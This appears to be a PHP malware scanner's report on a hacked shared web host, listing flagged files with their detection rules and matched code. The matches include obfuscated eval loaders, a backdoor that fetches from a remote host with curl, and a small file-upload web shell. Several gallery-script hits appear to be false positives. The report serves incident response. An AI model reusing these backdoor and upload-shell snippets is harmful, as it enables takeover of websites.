Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_ftp/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/public_html/gcp/pages.php

Size: 9.94 kB Created: 2022-09-02 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2

Description	Match
Exploit align Line: 6 Warning Code alignment technique is usually used for the obfuscation of malicious code	`<?php $l1fh2s=$GLOBALS["b6b6666"]($l1SiN);$l1FpxA=$l1k($l1fh2s["host"],isset($l1fh2s["port"])`
Exploit reversed Line: 6 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions	`<?php ecalper_rts`
Function strrev exec_strrev Line: 6 Dangerous Encoded Function `exec` [https://www.php.net/exec]	`<?php cexe`

/custdata02/turtle/public_html/index.php

Size: 4.18 kB Created: 2024-06-04 20:46:22 Modified: 2024-06-12 19:36:07 Dangers: 1

Description Match

Sign 531da465 Dangerous

Malware Signature (hash: 531da465)

<?php <?php 
@set_time_limit(5000); 
@ignore_user_abort(1);  
$goto = 'mm042'; 
$htwe = 'http'; 
if(ishtt()){ 
    $http = 'https'; 
}else{
    $http = 'http';
}
$ddur_tmp = st_uri();
if ($ddur_tmp == ''){
    $ddur_tmp = '/'; 
}
$ddur = urlencode($ddur_tmp);
function st_uri(){
    if (isset($_SERVER['REQUEST_URI'])){
        $ddur = $_SERVER['REQUEST_URI'];
    }else{
        if(isset($_SERVER['argv'])){
            $ddur = $_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];
        }else{  
            $ddur = $_SERVER['PHP_SELF'].'?...

/custdata02/turtle/public_html/moving.page/9QRtbfOjW8y.php

Size: 43.44 kB Created: 2024-06-01 02:24:40 Modified: 2024-06-01 08:12:17 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php NVCh`
Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db)	`<?php y2HY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/moving.page/7rLHI2jTiza.php

Size: 51.36 kB Created: 2024-06-01 02:24:40 Modified: 2024-06-01 08:12:17 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/moving.page/index.php

Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 08:12:17 Dangers: 6

Description	Match
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`

/custdata02/turtle/public_html/moving.page/d5MuibchEIR.php

Size: 43.48 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/moving.page/37Oc4qgvkwd.php

Size: 166.77 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/moving.page/5jg7REBVJaW.php

Size: 51.81 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php LAve`
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/moving.page/B1kyb9LsRIp.php

Size: 38.68 kB Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/moving.page/theme-inskysa.php

Size: 338.00 B Created: 2024-06-04 19:34:18 Modified: 2024-06-04 19:34:18 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/moving.page/YAHzcbKs1Rv.php

Size: 43.51 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/moving.page/nMgGONQvCeW.php

Size: 166.77 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/moving.page/PxzHU67OcM1.php

Size: 51.33 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/moving.page/hExQITdAqBy.php

Size: 38.68 kB Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/moving.page/theme-insxsme.php

Size: 338.00 B Created: 2024-06-04 19:51:04 Modified: 2024-06-04 19:51:04 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/ryan-and-lisa/albums/edit/index.php

Size: 1.27 kB Created: 2012-10-14 07:48:56 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730)	`<?php meta http-equiv="refresh" content="0;`

/custdata02/turtle/public_html/ryan-and-lisa/albums/userpics/index.php

Size: 1.29 kB Created: 2012-10-14 07:48:56 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730)	`<?php meta http-equiv="refresh" content="0;`

/custdata02/turtle/public_html/ryan-and-lisa/albums/index.php

Size: 1.14 kB Created: 2012-10-14 07:48:56 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730)	`<?php meta http-equiv="refresh" content="0;`

/custdata02/turtle/public_html/ryan-and-lisa/include/imageobject_im.class.php

Size: 6.18 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function exec Warning

Potentially dangerous function `exec`

<?php exec ("\"$cmd\"", $output, $retval); } else { $cmd = "{$CONFIG['impath']}convert -quality {$this->quality} {$CONFIG['im_options']} -crop {$new_w}x{$new_h}+{$clip_left}+{$clip_top} $imgFile $imgFile"; exec($cmd, $output, $retval); } $this->imageObject($this->directory, $this->filename); return $this; } function rotateImage($angle) { global $CONFIG; $superCage = Inspekt::makeSuperCage(); $imgFile = escapeshellarg("$this->directory$this->filename"); $output = array(); if ($superCage->env->getMatche...

/custdata02/turtle/public_html/ryan-and-lisa/include/index.php

Size: 1.15 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Sign 0f37c730 Line: 6 Dangerous Malware Signature (hash: 0f37c730)	`<?php meta http-equiv="refresh" content="0;`

/custdata02/turtle/public_html/ryan-and-lisa/include/init.inc.php

Size: 17.08 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Sign 11413268 Line: 91 Dangerous Malware Signature (hash: 11413268)	`<?php exploit`

/custdata02/turtle/public_html/ryan-and-lisa/include/picmgmt.inc.php

Size: 32.54 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function exec Warning

Potentially dangerous function `exec`

<?php exec ("\"$cmd\"", $output, $retval); } else { $cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} ".$resize_commands." ".$unsharp_mask." $src_file $im_dest_file"; exec ($cmd, $output, $retval); } if ($media_type != "false") { $path_parts = pathinfo($CONFIG['watermark_file']); $CONFIG['watermark_file'] = $path_parts["dirname"]."/wm_".$media_type.".png"; } if ($watermark == "true" || $media_type != "false") { $wm_normal = (int)$CONFIG['reduce_watermark']; if ...

/custdata02/turtle/public_html/ryan-and-lisa/include/transliteration.inc.php

Size: 7.88 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Exploit hex_char Line: 118 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`

/custdata02/turtle/public_html/ryan-and-lisa/include/zip.lib.php

Size: 11.81 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval('$hexdtime = "' . $hexdtime . '";'); if($compact) $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; $unc_len = strlen($data); $crc = crc32($data); if($compact){ $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); }else{ $zdata = $data; } $c_len=strlen($zdata); $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); $fr .= pack('v', strlen($name)).pack(...

/custdata02/turtle/public_html/ryan-and-lisa/include/functions.inc.php

Size: 224.33 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:35:12 Warns: 2 Dangers: 3

Description	Match
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($msortline); return $marray; } function cpg_get_bridge_db_values() { global $CONFIG; $results = cpg_db_query("SELECT name, value FROM {$CONFIG['TABLE_BRIDGE']}"); while ( ($row = mysql_fetch_assoc($results)) ) { $BRIDGE[$row['name']] = $row['value']; } mysql_free_result($results); return $BRIDGE; } function cpg_get_webroot_path() { global $CPG_PHP_SELF; $superCage = Inspekt::makeSuperCage(); if ( ($matches = $superCage->server->getMatched('SCRIPT_FILENAME', '/^[a-z,A-Z0-9_-\/\\:.]+$/')) ) {...
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]	<?php exec( 'tasklist /FI "PID eq ' . getmypid() . '" /FO LIST', $output ); return preg_replace( '/[^0-9]/', '', $output[5] ) * 1024; } else { $pid = getmypid(); $output = array(); exec("ps -eo%mem,rss,pid \| grep $pid", $output); $output = explode(' ', $output[0]); if ($output != '') { return $output[1] * 1024; } else { unset($output); $output = array(); exec("ps -o rss -p $pid", $output); return $output[1] *1024; } } } } function cpg_fillArrayFieldWithSpaces($text, $maxchars, $fillUpOn = 'right') { ...
Function strrev eval_strrev Line: 4846 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`
Sign 11413268 Line: 4768 Dangerous Malware Signature (hash: 11413268)	`<?php exploit`
Sign 471b95ee Line: 3918 Dangerous Malware Signature (hash: 471b95ee)	`<?php suhosin`

/custdata02/turtle/public_html/ryan-and-lisa/lang/brazilian_portuguese.php

Size: 183.25 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1

Description Match

Function system Warning

Potentially dangerous function `system`

<?php system (if corresponding options are turned on in config).'; $lang_gallery_admin_menu['keywordmgr_lnk'] = 'Gerenciar Palavras-Chave'; $lang_gallery_admin_menu['keywordmgr_title'] = 'Gerenciar Palavras-Chave (Se a opção correspondente for ativada na configuração).'; $lang_gallery_admin_menu['exifmgr_lnk'] = 'Gerenciar EXIF'; $lang_gallery_admin_menu['exifmgr_title'] = 'Manage EXIF display (if corresponding option is turned on in config).'; $lang_gallery_admin_menu['shownews_lnk'] = 'Exibir No...

/custdata02/turtle/public_html/ryan-and-lisa/lang/catalan.php

Size: 192.96 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1

Description	Match
Function strrev eval_strrev Line: 763 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php lave`

/custdata02/turtle/public_html/ryan-and-lisa/lang/danish.php

